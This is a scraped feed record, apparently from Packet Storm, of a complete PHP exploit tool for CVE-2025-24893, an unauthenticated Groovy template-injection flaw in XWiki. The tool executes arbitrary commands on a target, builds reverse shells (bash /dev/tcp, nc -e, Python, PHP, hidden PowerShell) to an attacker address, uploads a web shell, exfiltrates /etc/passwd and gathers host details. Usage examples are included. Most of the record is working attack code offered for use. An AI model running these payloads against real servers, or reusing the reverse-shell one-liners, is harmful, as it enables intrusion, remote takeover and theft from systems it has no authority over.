{“lastseen”:”2026-02-06T18:17:54″,”description”:”Proof of concept exploit for a critical template injection vulnerability in XWiki Platform that allows unauthenticated remote code execution. The vulnerability affects XWiki versions 5.3-milestone-2 to 15.10.10 and 16.0.0-rc-1 to 16.4.0, potentially…”,”published”:”2026-02-06T00:00:00″,”modified”:”2026-02-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:215049″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-24893″],”sourceData”:”=============================================================================================================================================\\n | # Title : XWiki 5.3-milestone-2 Remote Code Execution Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/xwiki\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/209041\/ \\u0026 \\tCVE-2025-24893\\n \\n [+] Summary : a critical template injection vulnerability in XWiki Platform that allows unauthenticated remote code execution. \\n The vulnerability affects XWiki versions 5.3-milestone-2 to 15.10.10 and 16.0.0-rc-1 to 16.4.0, potentially impacting thousands of enterprise wiki installations.\\n \\n [+] POC :\\n \\n # Check for vulnerability\\n php exploit.php http:\/\/target.com –check\\n \\n # Execute command\\n php exploit.php http:\/\/target.com –cmd \\”id\\”\\n php exploit.php http:\/\/target.com –cmd \\”whoami\\” –os windows\\n \\n # Create reverse shell\\n php exploit.php http:\/\/target.com –reverse 192.168.1.100:4444\\n php exploit.php http:\/\/target.com –reverse 192.168.1.100:4444 –shell python\\n \\n # Gather information\\n php exploit.php http:\/\/target.com –info\\n \\n # Upload file\\n php exploit.php http:\/\/target.com –upload shell.php:\/tmp\/shell.php\\n \\n # Download file\\n php exploit.php http:\/\/target.com –download \/etc\/passwd:passwd.txt\\n \\n \\u003c?php\\n \/**\\n * BY indoushka\\n *\/\\n \\n class XWikiExploit {\\n private $target;\\n private $path;\\n private $timeout = 10;\\n private $userAgent = \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\\”;\\n \\n public function __construct($target, $path = ‘\/’) {\\n $this-\\u003etarget = rtrim($target, ‘\/’);\\n $this-\\u003epath = $path;\\n }\\n \\n \/**\\n * Check if target is vulnerable\\n *\/\\n public function check() {\\n echo \\”[*] Checking target: {$this-\\u003etarget}\\\\n\\”;\\n \\n $response = $this-\\u003esendRequest(\\”\/xwiki\/bin\/view\/Main\/\\”);\\n \\n if (!$response) {\\n echo \\”[-] No response from target\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Extract version from HTML\\n preg_match(‘\/\\u003cdiv[^\\u003e]*id=\\”xwikiplatformversion\\”[^\\u003e]*\\u003e(.*?)\\u003c\\\\\/div\\u003e\/si’, $response, $matches);\\n \\n if (empty($matches)) {\\n echo \\”[-] Could not find version information\\\\n\\”;\\n return false;\\n }\\n \\n preg_match(‘\/XWiki.*?(\\\\d+\\\\.\\\\d+\\\\.\\\\d+)\/’, $matches[1], $versionMatch);\\n \\n if (empty($versionMatch)) {\\n echo \\”[-] Could not extract version number\\\\n\\”;\\n return false;\\n }\\n \\n $version = $versionMatch[1];\\n echo \\”[+] Detected XWiki version: {$version}\\\\n\\”;\\n \\n \/\/ Check if version is vulnerable\\n $vulnerable = $this-\\u003eisVersionVulnerable($version);\\n \\n if ($vulnerable) {\\n echo \\”[+] Target appears to be VULNERABLE!\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Target appears to be SAFE\\\\n\\”;\\n return false;\\n }\\n }\\n \\n \/**\\n * Execute command on target\\n *\/\\n public function executeCommand($command, $os = ‘unix’) {\\n echo \\”[*] Building payload for {$os}…\\\\n\\”;\\n \\n if ($os === ‘unix’ || $os === ‘linux’) {\\n $cmdArray = \\”‘sh’, ‘-c’, ‘{$command}’\\”;\\n } else {\\n \/\/ Windows\\n $cmdArray = \\”‘cmd.exe’, ‘\/b’, ‘\/q’, ‘\/c’, ‘{$command}’\\”;\\n }\\n \\n $payload = \\”{{async async=false}}{{groovy}}[{$cmdArray}].execute().text{{\/groovy}}{{\/async}}\\”;\\n \\n echo \\”[*] Sending payload…\\\\n\\”;\\n \\n $url = \\”\/xwiki\/bin\/get\/Main\/SolrSearch?media=rss\\u0026text=\\” . urlencode($payload);\\n $response = $this-\\u003esendRequest($url);\\n \\n if ($response) {\\n echo \\”[+] Command executed. Response:\\\\n\\”;\\n echo \\”—————————————-\\\\n\\”;\\n echo $response;\\n echo \\”\\\\n—————————————-\\\\n\\”;\\n return $response;\\n } else {\\n echo \\”[-] No response received\\\\n\\”;\\n return false;\\n }\\n }\\n \\n \/**\\n * Reverse shell for Unix\/Linux\\n *\/\\n public function reverseShell($ip, $port, $shellType = ‘bash’) {\\n echo \\”[*] Setting up reverse shell to {$ip}:{$port}\\\\n\\”;\\n \\n if ($shellType === ‘bash’) {\\n $command = \\”bash -i \\u003e\\u0026 \/dev\/tcp\/{$ip}\/{$port} 0\\u003e\\u00261\\”;\\n } elseif ($shellType === ‘nc’) {\\n $command = \\”nc -e \/bin\/sh {$ip} {$port}\\”;\\n } elseif ($shellType === ‘python’) {\\n $command = \\”python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\”{$ip}\\\\\\”,{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\\\\”\/bin\/sh\\\\\\”,\\\\\\”-i\\\\\\”]);’\\”;\\n } elseif ($shellType === ‘php’) {\\n $command = \\”php -r ‘\\\\$sock=fsockopen(\\\\\\”{$ip}\\\\\\”,{$port});exec(\\\\\\”\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\\\\\”);’\\”;\\n } else {\\n $command = \\”bash -i \\u003e\\u0026 \/dev\/tcp\/{$ip}\/{$port} 0\\u003e\\u00261\\”;\\n }\\n \\n \/\/ URL encode the command\\n return $this-\\u003eexecuteCommand($command, ‘unix’);\\n }\\n \\n \/**\\n * Reverse shell for Windows\\n *\/\\n public function reverseShellWindows($ip, $port) {\\n echo \\”[*] Setting up Windows reverse shell to {$ip}:{$port}\\\\n\\”;\\n \\n \/\/ PowerShell reverse shell\\n $command = \\”powershell -NoP -NonI -W Hidden -Exec Bypass -Command \\\\\\”\\\\$TCPClient = New-Object Net.Sockets.TCPClient(‘{$ip}’, {$port});\\\\$NetworkStream = \\\\$TCPClient.GetStream();\\\\$StreamWriter = New-Object IO.StreamWriter(\\\\$NetworkStream);\\\\$StreamWriter.WriteLine((Get-WmiObject Win32_ComputerSystem).Name + ‘:’ + (Get-WmiObject Win32_OperatingSystem).Version);\\\\$StreamWriter.Flush();while((\\\\$BytesRead = \\\\$NetworkStream.Read(\\\\$Buffer, 0, \\\\$Buffer.Length)) -gt 0){\\\\$Command = ([Text.Encoding]::ASCII).GetString(\\\\$Buffer, 0, \\\\$BytesRead – 1);\\\\$Output = try { Invoke-Expression \\\\$Command 2\\u003e\\u00261 | Out-String } catch { \\\\$_ | Out-String };\\\\$ReturnOutput = \\\\$Output + ‘PS ‘ + (Get-Location).Path + ‘\\u003e ‘;\\\\$StreamWriter.Write(\\\\$ReturnOutput);\\\\$StreamWriter.Flush()};\\\\$StreamWriter.Close()\\\\\\”\\”;\\n \\n return $this-\\u003eexecuteCommand($command, ‘windows’);\\n }\\n \\n \/**\\n * Information gathering\\n *\/\\n public function gatherInfo() {\\n echo \\”[*] Gathering system information…\\\\n\\”;\\n \\n $commands = [\\n ‘id’ =\\u003e ‘id’,\\n ‘whoami’ =\\u003e ‘whoami’,\\n ‘uname’ =\\u003e ‘uname -a’,\\n ‘pwd’ =\\u003e ‘pwd’,\\n ‘ps’ =\\u003e ‘ps aux | head -20’,\\n ‘users’ =\\u003e ‘cat \/etc\/passwd | head -20’,\\n ‘network’ =\\u003e ‘ifconfig || ip addr’\\n ];\\n \\n foreach ($commands as $name =\\u003e $cmd) {\\n echo \\”\\\\n[*] Executing: {$name}\\\\n\\”;\\n $this-\\u003eexecuteCommand($cmd, ‘unix’);\\n sleep(1); \/\/ Avoid rate limiting\\n }\\n }\\n \\n \/**\\n * File upload\\n *\/\\n public function uploadFile($localFile, $remotePath) {\\n if (!file_exists($localFile)) {\\n echo \\”[-] Local file not found: {$localFile}\\\\n\\”;\\n return false;\\n }\\n \\n $content = base64_encode(file_get_contents($localFile));\\n $command = \\”echo ‘{$content}’ | base64 -d \\u003e {$remotePath}\\”;\\n \\n echo \\”[*] Uploading {$localFile} to {$remotePath}\\\\n\\”;\\n return $this-\\u003eexecuteCommand($command, ‘unix’);\\n }\\n \\n \/**\\n * File download\\n *\/\\n public function downloadFile($remoteFile, $localFile) {\\n $command = \\”cat {$remoteFile} | base64\\”;\\n $response = $this-\\u003eexecuteCommand($command, ‘unix’);\\n \\n if ($response \\u0026\\u0026 preg_match(‘\/^[A-Za-z0-9+\\\\\/=]+$\/m’, trim($response))) {\\n $decoded = base64_decode(trim($response));\\n file_put_contents($localFile, $decoded);\\n echo \\”[+] File downloaded to: {$localFile}\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Failed to download file\\\\n\\”;\\n return false;\\n }\\n }\\n \\n \/**\\n * Private helper methods\\n *\/\\n private function sendRequest($uri) {\\n $url = $this-\\u003etarget . $uri;\\n \\n $ch = curl_init();\\n curl_setopt($ch, CURLOPT_URL, $url);\\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($ch, CURLOPT_TIMEOUT, $this-\\u003etimeout);\\n curl_setopt($ch, CURLOPT_USERAGENT, $this-\\u003euserAgent);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\\n curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\\n \\n $response = curl_exec($ch);\\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n \\n if (curl_errno($ch)) {\\n echo \\”[-] cURL Error: \\” . curl_error($ch) . \\”\\\\n\\”;\\n curl_close($ch);\\n return false;\\n }\\n \\n curl_close($ch);\\n \\n if ($httpCode == 200) {\\n return $response;\\n } else {\\n echo \\”[-] HTTP Error: {$httpCode}\\\\n\\”;\\n return false;\\n }\\n }\\n \\n private function isVersionVulnerable($version) {\\n $versionParts = explode(‘.’, $version);\\n \\n if (count($versionParts) \\u003c 3) {\\n return false;\\n }\\n \\n $major = (int)$versionParts[0];\\n $minor = (int)$versionParts[1];\\n $patch = (int)$versionParts[2];\\n \\n \/\/ Check vulnerable ranges\\n if ($major \\u003e= 5 \\u0026\\u0026 $major \\u003c= 15) {\\n if ($major == 5 \\u0026\\u0026 $minor \\u003e= 3) {\\n return true;\\n } elseif ($major == 15 \\u0026\\u0026 $minor == 10 \\u0026\\u0026 $patch \\u003c= 10) {\\n return true;\\n } elseif ($major \\u003e 5 \\u0026\\u0026 $major \\u003c 15) {\\n return true;\\n }\\n } elseif ($major == 16) {\\n if ($minor == 0 \\u0026\\u0026 $patch == 0) {\\n \/\/ 16.0.0-rc-1 is vulnerable\\n return true;\\n } elseif ($minor == 4 \\u0026\\u0026 $patch == 0) {\\n return true;\\n } elseif ($minor \\u003c 4) {\\n return true;\\n }\\n }\\n \\n return false;\\n }\\n }\\n \\n \/**\\n * Usage examples\\n *\/\\n function printHelp() {\\n echo \\”Powered by indoushka XWiki CVE-2025-24893 Exploit Tool\\\\n\\”;\\n echo \\”Usage:\\\\n\\”;\\n echo \\” php exploit.php \\u003ctarget\\u003e [options]\\\\n\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” –check Check if target is vulnerable\\\\n\\”;\\n echo \\” –cmd \\u003ccommand\\u003e Execute system command\\\\n\\”;\\n echo \\” –os \\u003cunix|windows\\u003e Target OS (default: unix)\\\\n\\”;\\n echo \\” –reverse \\u003cip:port\\u003e Create reverse shell\\\\n\\”;\\n echo \\” –shell \\u003ctype\\u003e Shell type (bash, nc, python, php)\\\\n\\”;\\n echo \\” –info Gather system information\\\\n\\”;\\n echo \\” –upload \\u003clocal:remote\\u003e Upload file\\\\n\\”;\\n echo \\” –download \\u003cremote:local\\u003e Download file\\\\n\\”;\\n echo \\” –path \\u003cpath\\u003e XWiki installation path (default: \/)\\\\n\\”;\\n echo \\” –help Show this help\\\\n\\\\n\\”;\\n echo \\”Examples:\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target.com –check\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target.com –cmd ‘id’\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target.com –reverse 192.168.1.100:4444\\\\n\\”;\\n echo \\” php exploit.php http:\/\/target.com –upload shell.php:\/tmp\/shell.php\\\\n\\”;\\n }\\n \\n \/**\\n * Main execution\\n *\/\\n if (PHP_SAPI !== ‘cli’) {\\n die(\\”This script must be run from command line\\\\n\\”);\\n }\\n \\n if ($argc \\u003c 2) {\\n printHelp();\\n exit(1);\\n }\\n \\n $target = $argv[1];\\n $options = [\\n ‘path’ =\\u003e ‘\/’,\\n ‘os’ =\\u003e ‘unix’\\n ];\\n \\n \/\/ Parse command line arguments\\n for ($i = 2; $i \\u003c $argc; $i++) {\\n switch ($argv[$i]) {\\n case ‘–check’:\\n $options[‘check’] = true;\\n break;\\n case ‘–cmd’:\\n $options[‘cmd’] = $argv[++$i];\\n break;\\n case ‘–os’:\\n $options[‘os’] = $argv[++$i];\\n break;\\n case ‘–reverse’:\\n $options[‘reverse’] = $argv[++$i];\\n break;\\n case ‘–shell’:\\n $options[‘shell’] = $argv[++$i];\\n break;\\n case ‘–info’:\\n $options[‘info’] = true;\\n break;\\n case ‘–upload’:\\n $options[‘upload’] = $argv[++$i];\\n break;\\n case ‘–download’:\\n $options[‘download’] = $argv[++$i];\\n break;\\n case ‘–path’:\\n $options[‘path’] = $argv[++$i];\\n break;\\n case ‘–help’:\\n printHelp();\\n exit(0);\\n default:\\n echo \\”Unknown option: {$argv[$i]}\\\\n\\”;\\n printHelp();\\n exit(1);\\n }\\n }\\n \\n \/\/ Create exploit instance\\n $exploit = new XWikiExploit($target, $options[‘path’]);\\n \\n \/\/ Execute requested action\\n if (isset($options[‘check’])) {\\n $exploit-\\u003echeck();\\n } elseif (isset($options[‘cmd’])) {\\n $exploit-\\u003eexecuteCommand($options[‘cmd’], $options[‘os’]);\\n } elseif (isset($options[‘reverse’])) {\\n list($ip, $port) = explode(‘:’, $options[‘reverse’]);\\n if ($options[‘os’] === ‘windows’) {\\n $exploit-\\u003ereverseShellWindows($ip, $port);\\n } else {\\n $shellType = $options[‘shell’] ?? ‘bash’;\\n $exploit-\\u003ereverseShell($ip, $port, $shellType);\\n }\\n } elseif (isset($options[‘info’])) {\\n $exploit-\\u003egatherInfo();\\n } elseif (isset($options[‘upload’])) {\\n list($local, $remote) = explode(‘:’, $options[‘upload’], 2);\\n $exploit-\\u003euploadFile($local, $remote);\\n } elseif (isset($options[‘download’])) {\\n list($remote, $local) = explode(‘:’, $options[‘download’], 2);\\n $exploit-\\u003edownloadFile($remote, $local);\\n } else {\\n echo \\”No action specified. Use –help for usage information.\\\\n\\”;\\n }\\n \\n echo \\”\\\\n[*] Exploit completed\\\\n\\”;\\n ?\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215049″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215049\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-06T18:17:54″,”description”:”Proof of concept exploit for a critical template injection vulnerability in XWiki Platform that allows unauthenticated remote code execution. The vulnerability affects XWiki versions 5.3-milestone-2…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-39432","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n